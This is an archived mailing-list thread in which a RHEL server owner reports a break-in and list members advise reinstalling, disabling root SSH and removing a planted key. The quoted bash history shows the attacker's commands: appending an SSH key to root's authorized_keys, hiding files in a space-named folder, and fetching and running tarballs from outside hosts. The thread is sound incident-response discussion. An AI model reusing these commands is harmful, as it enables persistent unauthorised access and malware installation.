FAQ Search Today's Posts Mark Forums Read
» Video Reviews

» Linux Archive

Linux-archive is a website aiming to archive linux email lists and to make them easily accessible for linux users/developers.


» Sponsor

» Partners

» Sponsor


 
 
LinkBack Thread Tools
 
Old 01-28-2010, 05:14 AM
Wahyu Darmawan
 
Default help

You may change your root password first, and then you can continue to analyze your system.

________________________________________
From: redhat-list-bounces@redhat.com [redhat-list-bounces@redhat.com] On Behalf Of Joy Methew [ml4joy@gmail.com]
Sent: Thursday, January 28, 2010 12:59 PM
To: General Red Hat Linux discussion list
Subject: help

Hello all,
i m using RHEL5.3 as a my mail server with real ip.i
configure my system mostly remotely.last login time of my system 27 jan
from this ip 118.129.153.43.
than i try to login at 28 jan in morning so i can`t got authentication as
root from my last password.
than i reboot the system reset my password.
i login as a root than i run "last" command i m sending tha first 10 lines
of last command...i thinks someone hack my system.i am sending history
command output.
now i remove .ssh directory and /var/tmp/*

please suggest wat is this??

thanks

last command out put:
root pts/1 117.199.118.234 Thu Jan 28 10:58 still logged in
root pts/0 117.199.118.234 Thu Jan 28 10:49 still logged in
root tty1 Thu Jan 28 10:48 - 10:52 (00:04)
reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 (00:25)
root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 (00:09)
root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 (02:25)
root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 (00:00)
root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 (00:00)
root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 (00:01)
root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 (00:03)

What is 165.red-79........this is nt my ip.


History Output

115 cat /proc/cpuinfo
116 mkdir .ssh
117 cd .ssh
118 echo ssh-rsa
AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6 YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdX PIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3 Q0It54KBwQ==
rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
~/.ssh/authorized_keys
119 cd /var/tmp
120 mkdir " "
121 cd " "
122 passwd
123 echo ssh-rsa
AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6 YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdX PIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3 Q0It54KBwQ==
rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
~/.ssh/authorized_keys
124 ps -x
125 cd /var/tmp
126 w
127 wget http://kok.ucoz.de/gosh.tgz
128 tar xvf gosh.tgz
129 cd gosh
130 chmod +x *
131 ./go.sh 121
132 w
133 ps -x
134 ps -aux
135 cd /var/tmp
136 cd " "
137 ls -a
138 wget http://helpbnc.myftp.org/danger/fld.tgz
139 tar xzvf fld.tgz
140 cd fld
141 chmod +x *
142 nano cyc.acc
143 nano cyc.acc.1
144 nano cyc.set
145 ./httpd
146 w
--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list

--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
 
Old 01-28-2010, 05:28 AM
Joy Methew
 
Default help

i have changed my root password

On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan
<Wahyu.Darmawan@ag-it.com>wrote:

> You may change your root password first, and then you can continue to
> analyze your system.
>
> ________________________________________
> From: redhat-list-bounces@redhat.com [redhat-list-bounces@redhat.com] On
> Behalf Of Joy Methew [ml4joy@gmail.com]
> Sent: Thursday, January 28, 2010 12:59 PM
> To: General Red Hat Linux discussion list
> Subject: help
>
> Hello all,
> i m using RHEL5.3 as a my mail server with real ip.i
> configure my system mostly remotely.last login time of my system 27 jan
> from this ip 118.129.153.43.
> than i try to login at 28 jan in morning so i can`t got authentication as
> root from my last password.
> than i reboot the system reset my password.
> i login as a root than i run "last" command i m sending tha first 10 lines
> of last command...i thinks someone hack my system.i am sending history
> command output.
> now i remove .ssh directory and /var/tmp/*
>
> please suggest wat is this??
>
> thanks
>
> last command out put:
> root pts/1 117.199.118.234 Thu Jan 28 10:58 still logged in
> root pts/0 117.199.118.234 Thu Jan 28 10:49 still logged in
> root tty1 Thu Jan 28 10:48 - 10:52 (00:04)
> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 (00:25)
> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 (00:09)
> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 (02:25)
> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 (00:00)
> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 (00:00)
> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 (00:01)
> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 (00:03)
>
> What is 165.red-79........this is nt my ip.
>
>
> History Output
>
> 115 cat /proc/cpuinfo
> 116 mkdir .ssh
> 117 cd .ssh
> 118 echo ssh-rsa
>
> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6 YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdX PIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3 Q0It54KBwQ==
> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
> ~/.ssh/authorized_keys
> 119 cd /var/tmp
> 120 mkdir " "
> 121 cd " "
> 122 passwd
> 123 echo ssh-rsa
>
> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6 YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdX PIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3 Q0It54KBwQ==
> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
> ~/.ssh/authorized_keys
> 124 ps -x
> 125 cd /var/tmp
> 126 w
> 127 wget http://kok.ucoz.de/gosh.tgz
> 128 tar xvf gosh.tgz
> 129 cd gosh
> 130 chmod +x *
> 131 ./go.sh 121
> 132 w
> 133 ps -x
> 134 ps -aux
> 135 cd /var/tmp
> 136 cd " "
> 137 ls -a
> 138 wget http://helpbnc.myftp.org/danger/fld.tgz
> 139 tar xzvf fld.tgz
> 140 cd fld
> 141 chmod +x *
> 142 nano cyc.acc
> 143 nano cyc.acc.1
> 144 nano cyc.set
> 145 ./httpd
> 146 w
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list
>
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list
>
--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
 
Old 01-28-2010, 05:29 AM
Joy Methew
 
Default help

still i m thinking how he/she got my password??


On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy@gmail.com> wrote:

> i have changed my root password
>
>
> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan@ag-it.com
> > wrote:
>
>> You may change your root password first, and then you can continue to
>> analyze your system.
>>
>> ________________________________________
>> From: redhat-list-bounces@redhat.com [redhat-list-bounces@redhat.com] On
>> Behalf Of Joy Methew [ml4joy@gmail.com]
>> Sent: Thursday, January 28, 2010 12:59 PM
>> To: General Red Hat Linux discussion list
>> Subject: help
>>
>> Hello all,
>> i m using RHEL5.3 as a my mail server with real ip.i
>> configure my system mostly remotely.last login time of my system 27 jan
>> from this ip 118.129.153.43.
>> than i try to login at 28 jan in morning so i can`t got authentication as
>> root from my last password.
>> than i reboot the system reset my password.
>> i login as a root than i run "last" command i m sending tha first 10 lines
>> of last command...i thinks someone hack my system.i am sending history
>> command output.
>> now i remove .ssh directory and /var/tmp/*
>>
>> please suggest wat is this??
>>
>> thanks
>>
>> last command out put:
>> root pts/1 117.199.118.234 Thu Jan 28 10:58 still logged in
>> root pts/0 117.199.118.234 Thu Jan 28 10:49 still logged in
>> root tty1 Thu Jan 28 10:48 - 10:52 (00:04)
>> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 (00:25)
>> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 (00:09)
>> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 (02:25)
>> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 (00:00)
>> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 (00:00)
>> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 (00:01)
>> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 (00:03)
>>
>> What is 165.red-79........this is nt my ip.
>>
>>
>> History Output
>>
>> 115 cat /proc/cpuinfo
>> 116 mkdir .ssh
>> 117 cd .ssh
>> 118 echo ssh-rsa
>>
>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6 YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdX PIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3 Q0It54KBwQ==
>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
>> ~/.ssh/authorized_keys
>> 119 cd /var/tmp
>> 120 mkdir " "
>> 121 cd " "
>> 122 passwd
>> 123 echo ssh-rsa
>>
>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6 YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdX PIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3 Q0It54KBwQ==
>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
>> ~/.ssh/authorized_keys
>> 124 ps -x
>> 125 cd /var/tmp
>> 126 w
>> 127 wget http://kok.ucoz.de/gosh.tgz
>> 128 tar xvf gosh.tgz
>> 129 cd gosh
>> 130 chmod +x *
>> 131 ./go.sh 121
>> 132 w
>> 133 ps -x
>> 134 ps -aux
>> 135 cd /var/tmp
>> 136 cd " "
>> 137 ls -a
>> 138 wget http://helpbnc.myftp.org/danger/fld.tgz
>> 139 tar xzvf fld.tgz
>> 140 cd fld
>> 141 chmod +x *
>> 142 nano cyc.acc
>> 143 nano cyc.acc.1
>> 144 nano cyc.set
>> 145 ./httpd
>> 146 w
>> --
>> redhat-list mailing list
>> unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
>> https://www.redhat.com/mailman/listinfo/redhat-list
>>
>> --
>> redhat-list mailing list
>> unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
>> https://www.redhat.com/mailman/listinfo/redhat-list
>>
>
>
--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
 
Old 01-28-2010, 05:30 AM
Joy Methew
 
Default help

i use putty for remotely login

On Thu, Jan 28, 2010 at 11:59 AM, Joy Methew <ml4joy@gmail.com> wrote:

> still i m thinking how he/she got my password??
>
>
>
> On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy@gmail.com> wrote:
>
>> i have changed my root password
>>
>>
>> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <
>> Wahyu.Darmawan@ag-it.com> wrote:
>>
>>> You may change your root password first, and then you can continue to
>>> analyze your system.
>>>
>>> ________________________________________
>>> From: redhat-list-bounces@redhat.com [redhat-list-bounces@redhat.com] On
>>> Behalf Of Joy Methew [ml4joy@gmail.com]
>>> Sent: Thursday, January 28, 2010 12:59 PM
>>> To: General Red Hat Linux discussion list
>>> Subject: help
>>>
>>> Hello all,
>>> i m using RHEL5.3 as a my mail server with real ip.i
>>> configure my system mostly remotely.last login time of my system 27 jan
>>> from this ip 118.129.153.43.
>>> than i try to login at 28 jan in morning so i can`t got authentication as
>>> root from my last password.
>>> than i reboot the system reset my password.
>>> i login as a root than i run "last" command i m sending tha first 10
>>> lines
>>> of last command...i thinks someone hack my system.i am sending history
>>> command output.
>>> now i remove .ssh directory and /var/tmp/*
>>>
>>> please suggest wat is this??
>>>
>>> thanks
>>>
>>> last command out put:
>>> root pts/1 117.199.118.234 Thu Jan 28 10:58 still logged in
>>> root pts/0 117.199.118.234 Thu Jan 28 10:49 still logged in
>>> root tty1 Thu Jan 28 10:48 - 10:52 (00:04)
>>> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 (00:25)
>>> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 (00:09)
>>> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 (02:25)
>>> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 (00:00)
>>> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 (00:00)
>>> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 (00:01)
>>> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 (00:03)
>>>
>>> What is 165.red-79........this is nt my ip.
>>>
>>>
>>> History Output
>>>
>>> 115 cat /proc/cpuinfo
>>> 116 mkdir .ssh
>>> 117 cd .ssh
>>> 118 echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6 YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdX PIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3 Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
>>> ~/.ssh/authorized_keys
>>> 119 cd /var/tmp
>>> 120 mkdir " "
>>> 121 cd " "
>>> 122 passwd
>>> 123 echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6 YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdX PIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3 Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
>>> ~/.ssh/authorized_keys
>>> 124 ps -x
>>> 125 cd /var/tmp
>>> 126 w
>>> 127 wget http://kok.ucoz.de/gosh.tgz
>>> 128 tar xvf gosh.tgz
>>> 129 cd gosh
>>> 130 chmod +x *
>>> 131 ./go.sh 121
>>> 132 w
>>> 133 ps -x
>>> 134 ps -aux
>>> 135 cd /var/tmp
>>> 136 cd " "
>>> 137 ls -a
>>> 138 wget http://helpbnc.myftp.org/danger/fld.tgz
>>> 139 tar xzvf fld.tgz
>>> 140 cd fld
>>> 141 chmod +x *
>>> 142 nano cyc.acc
>>> 143 nano cyc.acc.1
>>> 144 nano cyc.set
>>> 145 ./httpd
>>> 146 w
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>
>>
>
--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
 
Old 01-28-2010, 07:14 AM
Bohdan Sydor
 
Default help

Joy Methew wrote:

> i login as a root than i run "last" command i m sending tha first 10 lines
> of last command...i thinks someone hack my system.i am sending history
> command output.
> now i remove .ssh directory and /var/tmp/*
>
> please suggest wat is this??

Hi,

if your system was compromised, then the most secure next step is to
reinstall the system.

What I can see in the bash history, the attacker downloaded and
installed custom software.
Please send the output from the following commands run as root:

ps aux
pstree
netstat -ntulp
getent passwd

Regards

--
Bohdan Sydor
RHC{E,I,X}
www.sydor.net

--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
 
Old 01-28-2010, 07:24 AM
Prabhakar Pandey
 
Default help

i have recently installed fedora-8 together with windows vista.
i hav some problems in fedora .
1. my time is not showing correctly in fedora as i try to change it the time in vista is changed.
2. Software Updater isn't working correctly . as i try to use it it hangs and i am unbale to do anything .

3. how do i install movie player and other media players in fedora .
4. how can i configure yum in fedora -8.

thanksPrabhakar Pandey

--
users mailing list
users@lists.fedoraproject.org
To unsubscribe or change subscription options:
https://admin.fedoraproject.org/mailman/listinfo/users
Guidelines: http://fedoraproject.org/wiki/Communicate/MailingListGuidelines
 
Old 01-28-2010, 11:08 AM
"Marti, Robert"
 
Default help

Yes you were hacked. Hope you have backups because you should reinstall.

Sent from my iPhone

On Jan 28, 2010, at 0:11, "Joy Methew" <ml4joy@gmail.com> wrote:

> Hello all,
> i m using RHEL5.3 as a my mail server with real
> ip.i
> configure my system mostly remotely.last login time of my system 27
> jan
> from this ip 118.129.153.43.
> than i try to login at 28 jan in morning so i can`t got
> authentication as
> root from my last password.
> than i reboot the system reset my password.
> i login as a root than i run "last" command i m sending tha first 10
> lines
> of last command...i thinks someone hack my system.i am sending history
> command output.
> now i remove .ssh directory and /var/tmp/*
>
> please suggest wat is this??
>
> thanks
>
> last command out put:
> root pts/1 117.199.118.234 Thu Jan 28 10:58 still
> logged in
> root pts/0 117.199.118.234 Thu Jan 28 10:49 still
> logged in
> root tty1 Thu Jan 28 10:48 - 10:52
> (00:04)
> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45
> (00:25)
> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52
> (00:09)
> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27
> (02:25)
> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34
> (00:00)
> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33
> (00:00)
> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32
> (00:01)
> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51
> (00:03)
>
> What is 165.red-79........this is nt my ip.
>
>
> History Output
>
> 115 cat /proc/cpuinfo
> 116 mkdir .ssh
> 117 cd .ssh
> 118 echo ssh-rsa
> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH
> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ
> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLR f
> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod
> 600
> ~/.ssh/authorized_keys
> 119 cd /var/tmp
> 120 mkdir " "
> 121 cd " "
> 122 passwd
> 123 echo ssh-rsa
> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH
> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ
> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLR f
> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod
> 600
> ~/.ssh/authorized_keys
> 124 ps -x
> 125 cd /var/tmp
> 126 w
> 127 wget http://kok.ucoz.de/gosh.tgz
> 128 tar xvf gosh.tgz
> 129 cd gosh
> 130 chmod +x *
> 131 ./go.sh 121
> 132 w
> 133 ps -x
> 134 ps -aux
> 135 cd /var/tmp
> 136 cd " "
> 137 ls -a
> 138 wget http://helpbnc.myftp.org/danger/fld.tgz
> 139 tar xzvf fld.tgz
> 140 cd fld
> 141 chmod +x *
> 142 nano cyc.acc
> 143 nano cyc.acc.1
> 144 nano cyc.set
> 145 ./httpd
> 146 w
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list

--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
 
Old 01-28-2010, 11:11 AM
"Marti, Robert"
 
Default help

Brute force attacks. Leaving root ssh open to the world us begging to
be owned like this. Always turn that off or use key only auth for root
on Internet facing boxes.

Sent from my iPhone

On Jan 28, 2010, at 0:33, "Joy Methew" <ml4joy@gmail.com> wrote:

> still i m thinking how he/she got my password??
>
>
> On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy@gmail.com> wrote:
>
>> i have changed my root password
>>
>>
>> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan@ag-it.com
>>> wrote:
>>
>>> You may change your root password first, and then you can continue
>>> to
>>> analyze your system.
>>>
>>> ________________________________________
>>> From: redhat-list-bounces@redhat.com [redhat-list-
>>> bounces@redhat.com] On
>>> Behalf Of Joy Methew [ml4joy@gmail.com]
>>> Sent: Thursday, January 28, 2010 12:59 PM
>>> To: General Red Hat Linux discussion list
>>> Subject: help
>>>
>>> Hello all,
>>> i m using RHEL5.3 as a my mail server with real
>>> ip.i
>>> configure my system mostly remotely.last login time of my system
>>> 27 jan
>>> from this ip 118.129.153.43.
>>> than i try to login at 28 jan in morning so i can`t got
>>> authentication as
>>> root from my last password.
>>> than i reboot the system reset my password.
>>> i login as a root than i run "last" command i m sending tha first
>>> 10 lines
>>> of last command...i thinks someone hack my system.i am sending
>>> history
>>> command output.
>>> now i remove .ssh directory and /var/tmp/*
>>>
>>> please suggest wat is this??
>>>
>>> thanks
>>>
>>> last command out put:
>>> root pts/1 117.199.118.234 Thu Jan 28 10:58 still
>>> logged in
>>> root pts/0 117.199.118.234 Thu Jan 28 10:49 still
>>> logged in
>>> root tty1 Thu Jan 28 10:48 - 10:52
>>> (00:04)
>>> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45
>>> (00:25)
>>> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52
>>> (00:09)
>>> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27
>>> (02:25)
>>> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34
>>> (00:00)
>>> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33
>>> (00:00)
>>> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32
>>> (00:01)
>>> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51
>>> (00:03)
>>>
>>> What is 165.red-79........this is nt my ip.
>>>
>>>
>>> History Output
>>>
>>> 115 cat /proc/cpuinfo
>>> 116 mkdir .ssh
>>> 117 cd .ssh
>>> 118 echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH
>>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ
>>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLR f
>>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh;
>>> chmod 600
>>> ~/.ssh/authorized_keys
>>> 119 cd /var/tmp
>>> 120 mkdir " "
>>> 121 cd " "
>>> 122 passwd
>>> 123 echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH
>>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ
>>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLR f
>>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh;
>>> chmod 600
>>> ~/.ssh/authorized_keys
>>> 124 ps -x
>>> 125 cd /var/tmp
>>> 126 w
>>> 127 wget http://kok.ucoz.de/gosh.tgz
>>> 128 tar xvf gosh.tgz
>>> 129 cd gosh
>>> 130 chmod +x *
>>> 131 ./go.sh 121
>>> 132 w
>>> 133 ps -x
>>> 134 ps -aux
>>> 135 cd /var/tmp
>>> 136 cd " "
>>> 137 ls -a
>>> 138 wget http://helpbnc.myftp.org/danger/fld.tgz
>>> 139 tar xzvf fld.tgz
>>> 140 cd fld
>>> 141 chmod +x *
>>> 142 nano cyc.acc
>>> 143 nano cyc.acc.1
>>> 144 nano cyc.set
>>> 145 ./httpd
>>> 146 w
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request@redhat.com?
>>> subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request@redhat.com?
>>> subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>
>>
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list

--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
 
Old 01-28-2010, 11:50 AM
mark
 
Default help

Joy Methew wrote:

Hello all,
i m using RHEL5.3 as a my mail server with real ip.i
configure my system mostly remotely.last login time of my system 27 jan
from this ip 118.129.153.43.
than i try to login at 28 jan in morning so i can`t got authentication as
root from my last password.
than i reboot the system reset my password.
i login as a root than i run "last" command i m sending tha first 10 lines
of last command...i thinks someone hack my system.i am sending history
command output.
now i remove .ssh directory and /var/tmp/*

please suggest wat is this??

<snip>

Copy your /root/.ssh/authorized_keys to a backup name, and edit the existing
one to remove the last one or two, but REMOVE THE KEY YOU SEE IN THERE THAT
MATCHES THE ONE IN THE ECHO COMMAND. Otherwise, your attacker will just get in
*without* a password, just an exchange of public and private keys via ssh.


mark

--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
 
Old 01-28-2010, 12:03 PM
"Marti, Robert"
 
Default help

Also you're running 5.3 you said - which kernel version? Iirc there
was a remote privelege that's been fixed but not if you don't update.

Sent from my iPhone

On Jan 28, 2010, at 6:56, "mark" <m.roth@5-cent.us> wrote:

> Joy Methew wrote:
>> Hello all,
>> i m using RHEL5.3 as a my mail server with real
>> ip.i
>> configure my system mostly remotely.last login time of my system 27
>> jan
>> from this ip 118.129.153.43.
>> than i try to login at 28 jan in morning so i can`t got
>> authentication as
>> root from my last password.
>> than i reboot the system reset my password.
>> i login as a root than i run "last" command i m sending tha first
>> 10 lines
>> of last command...i thinks someone hack my system.i am sending
>> history
>> command output.
>> now i remove .ssh directory and /var/tmp/*
>>
>> please suggest wat is this??
> <snip>
>
> Copy your /root/.ssh/authorized_keys to a backup name, and edit the
> existing
> one to remove the last one or two, but REMOVE THE KEY YOU SEE IN
> THERE THAT
> MATCHES THE ONE IN THE ECHO COMMAND. Otherwise, your attacker will
> just get in
> *without* a password, just an exchange of public and private keys
> via ssh.
>
> mark
>
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list

--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
 

Thread Tools




All times are GMT. The time now is 06:56 PM.

VBulletin, Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO ©2007, Crawlability, Inc.
Copyright 2007 - 2008, www.linux-archive.org